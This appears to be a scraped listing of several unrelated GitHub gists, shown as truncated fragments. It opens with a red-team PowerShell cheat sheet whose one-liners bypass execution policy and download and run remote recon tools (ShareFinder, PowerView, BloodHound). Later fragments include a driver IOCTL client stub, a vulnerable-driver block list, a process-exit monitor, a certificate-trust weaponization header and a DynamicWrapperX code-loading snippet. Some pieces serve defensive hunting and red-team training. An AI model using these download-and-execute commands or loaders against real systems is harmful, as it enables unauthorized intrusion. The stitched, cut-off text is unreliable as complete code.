RedTeam_CheatSheet.ps1
Created November 25, 2019
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('');Invoke-BloodHound"
Source.cpp
Created August 20, 2023
#include <windows.h>
#include <iostream>
#include <dbghelp.h>
#include <TlHelp32.h>
#define IOCTL_BASE 0x80012008
constexpr DWORD IREC_IOCTL(DWORD x) { return IOCTL_BASE + x; }
static const char* DeviceName = R"(\\.\IREC)";
blockeddrivers-vt-annotated.xml
Created March 6, 2023
Microsoft recommended driver block rules, but annotated with samples that are present in VirusTotal
Microsoft recommended driver block rules, but annotated with samples that are present in VirusTotal
<ns0:SiPolicy xmlns:ns0="urn:schemas-microsoft-com:sipolicy">
<ns0:Option>Enabled:Unsigned System Integrity Policy</ns0:Option>
<ns0:Option>Enabled:Advanced Boot Options Menu</ns0:Option>
04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """,
05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,""", Inc.""",DriverAgent Direct I/O for 64-bit Windows
4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,""", Inc""",DriverAgent Direct I/O for 64-bit Windows
B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,""", Inc.""",DriverAgent Direct I/O for 64-bit Windows
7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO
MHaggis /
Created October 17, 2022 15:58
Table Top With Teeth - Training Exercise


The following script is designed to create artifacts that teams can use to hunt, new or interesting capabilities.

The following table top is based on the code here:

This script is self-contained. It should dynamically write a DLL to disk and load it in to cscript.exe

To Invoke cscript.exe stranger_things.js This example expects a 64bit system.

get_cmdline.reg
Created September 8, 2022
Monitoring Silent Process Exit
Monitoring Silent Process Exit
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\nltest.exe]
"MonitorProcess"="powershell.exe -Command \"Get-WmiObject win32_process -Filter 'ProcessID = %e' | select CreationDate,ProcessId,CommandLine >> C:\\\\Test\\\\Logcmdline.txt\""
Find-Assemblies.ps1
Created February 14, 2020 04:51 — forked from TheWover/Find-Assemblies.ps1
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
HelpMessage="Directory to search for .NET Assemblies in.")]
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
RemoteCertTrust.ps1
Created March 31, 2022 18:05 — forked from mattifestation/RemoteCertTrust.ps1
An example weaponization of trusting a cloned MSFT root CA certificate by installing directly into the registry
$CertThumbprint = '1F3D38F280635F275BE92B87CF83E40E40458400'
sc.js
Created February 2, 2022 13:59
DynamicWrapperX - Register Code Example
//Example Reference:
// Test
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version=""/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';